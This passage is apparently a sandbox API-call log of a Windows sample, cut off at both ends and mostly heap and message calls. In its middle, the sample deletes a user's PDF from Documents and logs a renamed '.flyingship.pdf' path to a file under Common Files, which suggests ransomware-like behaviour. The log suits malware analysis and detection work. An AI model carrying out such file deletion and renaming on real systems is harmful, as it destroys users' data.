hHeap=0x8a0000) returned 1 [0173.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0173.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0173.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0173.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0173.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0173.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0173.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0173.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0173.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0173.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0173.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0173.374] FreeLibrary (hLibModule=0x75990000) returned 1 [0173.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0173.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0173.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0173.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0173.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0173.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0173.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0173.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0173.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0173.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0173.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0173.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0173.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0173.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0173.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0173.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0173.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0173.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0173.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0173.375] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.375] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.375] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.375] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.375] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0173.375] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.375] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.375] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0173.376] FreeLibrary (hLibModule=0x75990000) returned 1 [0173.376] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.376] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.376] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf", lpFilePart=0x0) returned 0x43 [0173.377] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb702510, ftCreationTime.dwHighDateTime=0x1d5d9dc, ftLastAccessTime.dwLowDateTime=0x2ad3e090, ftLastAccessTime.dwHighDateTime=0x1d5dc0a, ftLastWriteTime.dwLowDateTime=0xcb29900, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xce08, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="XdF9hOa.pdf", cAlternateFileName="")) returned 0x90ae18 [0173.378] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\xdf9hoa.pdf")) returned 1 [0173.386] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb702510, ftCreationTime.dwHighDateTime=0x1d5d9dc, ftLastAccessTime.dwLowDateTime=0x2ad3e090, ftLastAccessTime.dwHighDateTime=0x1d5dc0a, ftLastWriteTime.dwLowDateTime=0xcb29900, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xce08, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="XdF9hOa.pdf", cAlternateFileName="")) returned 0 [0173.387] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0173.388] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0173.388] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.388] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="df", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.388] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.388] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0173.419] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0173.420] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.420] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0173.420] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.420] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0173.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0173.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa6f010 [0173.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0173.421] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0173.421] ReadFile (in: hFile=0x138, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87f43c*=0x127a, lpOverlapped=0x0) returned 1 [0173.421] ReadFile (in: hFile=0x138, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0173.421] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x127a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.422] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0173.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6f010 | out: hHeap=0x8a0000) returned 1 [0173.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0173.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0173.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.flyingship.pdf\r\n", cchWideChar=81, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 81 [0173.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x51) returned 0x8c4a48 [0173.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.flyingship.pdf\r\n", cchWideChar=81, lpMultiByteStr=0x8c4a48, cbMultiByte=81, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.flyingship.pdf\r\n", lpUsedDefaultChar=0x0) returned 81 [0173.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0173.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0173.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0173.422] WriteFile (in: hFile=0x138, lpBuffer=0x9a5d78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d78*, lpNumberOfBytesWritten=0x87f43c*=0x50, lpOverlapped=0x0) returned 1 [0173.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0173.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.422] CloseHandle (hObject=0x138) returned 1 [0173.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0173.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0173.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0173.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0173.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0173.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0173.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0173.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0173.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0173.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0173.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0173.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0173.426] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0173.426] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0173.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0173.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0173.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0173.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0173.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0173.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0173.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0173.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0173.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0173.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0173.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0173.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0173.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0173.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0173.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0173.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0173.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0173.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0173.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0173.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0173.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0173.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0173.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0173.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0173.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0173.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0173.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0173.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0173.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0173.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0173.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0173.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0173.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0173.427] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0173.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0173.427] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0173.427] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0173.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0173.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0173.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0173.428] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0173.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0173.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0173.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0173.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0173.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0173.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0173.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0173.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0173.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0173.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0173.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd828 [0173.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0173.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0173.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0173.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0173.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0173.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0173.428] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0173.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0173.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0173.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0173.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0173.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0173.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0173.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0173.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0173.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0173.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0173.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0173.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0173.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0173.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0173.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0173.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0173.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0173.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0173.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0173.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0173.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0173.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0173.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0173.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0173.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0173.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0173.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0173.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 